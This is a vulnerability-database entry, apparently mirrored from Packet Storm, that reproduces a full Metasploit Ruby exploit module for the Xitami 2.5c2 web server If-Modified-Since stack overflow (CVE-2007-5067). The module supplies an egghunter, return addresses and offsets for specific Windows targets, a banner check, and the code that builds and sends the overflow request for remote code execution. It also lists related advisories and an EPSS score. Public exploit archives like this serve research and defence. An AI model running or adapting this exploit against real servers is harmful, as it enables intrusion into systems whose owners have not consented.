Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPatrickPACKETSTORM:82994
HistoryNov 26, 2009 - 12:00 a.m.

Xitami 2.5c2 Web Server If-Modified-Since Overflow

2009-11-2600:00:00
patrick
packetstormsecurity.com
34

0.951 High

EPSS

Percentile

99.3%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Remote::Egghunter  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Xitami 2.5c2 Web Server If-Modified-Since Overflow',  
'Description' => %q{  
This module exploits a stack overflow in the iMatix Corporation  
Xitami Web Server. If a malicious user sends an If-Modified-Since  
header containing an overly long string, it may be possible to  
execute a payload remotely. Due to size constraints, this module uses  
the Egghunter technique. You may wish to adjust WfsDelay appropriately.  
},  
'Author' => 'patrick',  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'CVE', '2007-5067' ],  
[ 'OSVDB', '40594'],  
[ 'OSVDB', '40595'],  
[ 'BID', '25772' ],  
[ 'URL', 'http://www.milw0rm.com/exploits/4450' ],  
],  
'Privileged' => false,  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'Space' => 700,  
'BadChars' => "\x00\x0a\x0d",  
},  
'Platform' => ['win'],  
'Targets' =>  
[  
# Patrick - Both tested OK 20070928 - w2ksp0, w2ksp4, xpsp0, xpsp2 en.  
[ 'xigui32.exe Universal', { 'Ret' => "\xff\xce\x44", 'Offset' => 40 } ], # 0x0044ceff ret xigui32.exe  
[ 'xitami.exe Universal', { 'Ret' => "\xf2\xc1\x47", 'Offset' => 68 } ], # 0x0047c1f2 ret xitami.exe  
],  
'DisclosureDate' => 'Sep 24 2007',  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(80),  
],self.class)  
end  
  
def check  
connect  
sock.put("GET / HTTP/1.1\r\n\r\n")  
banner = sock.get(-1,3)  
disconnect  
  
if (banner =~ /Xitami/)  
return Exploit::CheckCode::Appears  
end  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
connect  
  
hunter = generate_egghunter  
egg = hunter[1]  
  
sploit = "GET / HTTP/1.1\r\n"  
sploit << "Host: " + egg + egg + payload.encoded + "\r\n"  
sploit << "If-Modified-Since: " + Rex::Arch::X86.jmp_short(3) + ", "  
sploit << hunter[0] + rand_text_alphanumeric(target['Offset']) + target['Ret']  
  
sock.put(sploit + "\r\n\r\n")  
  
print_status("Waiting for payload to execute...")  
  
handler  
disconnect  
end  
  
end  
`

Related

nvd 1
cve 1
cvelist 1
d2 1
canvas 1
openvas 1
prion 1
nvd
nvd
CVE-2007-5067
2007-09-24 23:17:00
cve
cve
CVE-2007-5067
2007-09-24 23:17:00
cvelist
cvelist
CVE-2007-5067
2007-09-24 23:00:00
d2
d2
DSquare Exploit Pack: D2SEC_XITAMI
2007-09-24 23:17:00
canvas
canvas
Immunity Canvas: XITAMI
2007-09-24 23:17:00
openvas
openvas
Xitami Web Server If-Modified-Since Buffer Overflow Vulnerability
2011-06-13 00:00:00
prion
prion
Buffer overflow
2007-09-24 23:17:00

0.951 High

EPSS

Percentile

99.3%

JSON
Related for PACKETSTORM:82994
nvd1cve1cvelist1d21canvas1openvas1prion1